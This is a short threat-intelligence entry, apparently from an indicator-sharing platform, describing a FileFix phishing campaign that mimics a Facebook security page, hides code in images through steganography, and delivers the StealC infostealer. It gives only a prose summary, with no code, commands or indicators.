FileFix in the wild! New FileFix campaign goes beyond POC and leverages steganography
Essential information
- Published
- 16/09/2025 14:29
- Modified
- 16/09/2025 14:42
- Tags
- 2025-09-16 filefix infostealer multistage payload obfuscation phishing social engineering stealc steganography
- Related entities
- 17 observables, 14 techniques (mitre), 1 malware, 10 others
Description
A sophisticated FileFix attack campaign has been discovered, marking the first use of this technique beyond proof-of-concept. The attack employs a complex phishing infrastructure, including a multilingual site mimicking Facebook security. It uses steganography to conceal malicious code in images, with a multistage payload delivery system featuring layered obfuscation and evasion techniques. The final payload deploys a StealC infostealer targeting various applications and credentials. The campaign has evolved rapidly over two weeks, indicating a global targeting strategy with potential victims in multiple countries. This attack represents a significant advancement in *Fix attack sophistication, combining FileFix with advanced tradecraft to maximize both evasion and impact.